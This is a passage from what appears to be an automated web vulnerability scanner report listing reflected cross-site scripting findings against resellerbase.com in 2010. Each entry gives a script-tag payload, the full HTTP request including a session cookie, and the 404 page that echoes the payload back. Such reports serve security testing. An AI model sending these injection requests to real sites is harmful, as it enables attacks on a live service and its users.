2.5530. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/folder.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f7438<script>alert(1)</script>319020e45a4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/imagesf7438<script>alert(1)</script>319020e45a4/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/imagesf7438<script>alert(1)</script>319020e45a4/folder.gif was not found on this server.</p>
...[SNIP]...

2.5531. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/folder.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e07d7<script>alert(1)</script>3c0d83bda41 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/folder.gife07d7<script>alert(1)</script>3c0d83bda41 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/folder.gife07d7<script>alert(1)</script>3c0d83bda41 was not found on this server.</p>
...[SNIP]...

2.5532. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/folder.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/folder.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f44c0<script>alert(1)</script>21e005d027b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/folder.gif?f44c0<script>alert(1)</script>21e005d027b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/folder.gif?f44c0<script>alert(1)</script>21e005d027b=1 was not found on this server.</p>
...[SNIP]...

2.5533. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 409cc<script>alert(1)</script>0c0666c6a3d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service409cc<script>alert(1)</script>0c0666c6a3d/web-hosting/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service409cc<script>alert(1)</script>0c0666c6a3d/web-hosting/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5534. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 78b74<script>alert(1)</script>2ee06c88887 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting78b74<script>alert(1)</script>2ee06c88887/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting78b74<script>alert(1)</script>2ee06c88887/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5535. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7bab5<script>alert(1)</script>dcad761b354 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes7bab5<script>alert(1)</script>dcad761b354/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes7bab5<script>alert(1)</script>dcad761b354/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5536. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload faa69<script>alert(1)</script>5e274f9059c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmosfaa69<script>alert(1)</script>5e274f9059c/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmosfaa69<script>alert(1)</script>5e274f9059c/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5537. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1e859<script>alert(1)</script>c42c4ef98ef was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images1e859<script>alert(1)</script>c42c4ef98ef/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images1e859<script>alert(1)</script>c42c4ef98ef/rating/ was not found on this server.</p>
...[SNIP]...

2.5538. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4e497<script>alert(1)</script>9ac3422b427 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating4e497<script>alert(1)</script>9ac3422b427/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating4e497<script>alert(1)</script>9ac3422b427/ was not found on this server.</p>
...[SNIP]...

2.5539. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5683a<script>alert(1)</script>abb7a21ea5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/?5683a<script>alert(1)</script>abb7a21ea5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/?5683a<script>alert(1)</script>abb7a21ea5=1 was not found on this server.</p>
...[SNIP]...

2.5540. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d15f2<script>alert(1)</script>0fb98ea6245 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviced15f2<script>alert(1)</script>0fb98ea6245/web-hosting/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviced15f2<script>alert(1)</script>0fb98ea6245/web-hosting/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5541. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3f92d<script>alert(1)</script>9894e58098b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting3f92d<script>alert(1)</script>9894e58098b/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting3f92d<script>alert(1)</script>9894e58098b/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5542. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 28773<script>alert(1)</script>532094cb8cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes28773<script>alert(1)</script>532094cb8cc/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes28773<script>alert(1)</script>532094cb8cc/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5543. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f1e19<script>alert(1)</script>73f0ce8a265 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmosf1e19<script>alert(1)</script>73f0ce8a265/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmosf1e19<script>alert(1)</script>73f0ce8a265/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5544. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a1ca9<script>alert(1)</script>e2547d40257 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/imagesa1ca9<script>alert(1)</script>e2547d40257/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/imagesa1ca9<script>alert(1)</script>e2547d40257/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5545. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 39390<script>alert(1)</script>4d202c76a8a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating39390<script>alert(1)</script>4d202c76a8a/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating39390<script>alert(1)</script>4d202c76a8a/0.gif was not found on this server.</p>
...[SNIP]...

2.5546. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3fbe6<script>alert(1)</script>6104b9b2a4a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/0.gif3fbe6<script>alert(1)</script>6104b9b2a4a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/0.gif3fbe6<script>alert(1)</script>6104b9b2a4a was not found on this server.</p>
...[SNIP]...

2.5547. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8e7bd<script>alert(1)</script>2f5954816c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/0.gif?8e7bd<script>alert(1)</script>2f5954816c1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/0.gif?8e7bd<script>alert(1)</script>2f5954816c1=1 was not found on this server.</p>
...[SNIP]...

2.5548. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 876ce<script>alert(1)</script>f278be6c08a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service876ce<script>alert(1)</script>f278be6c08a/web-hosting/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
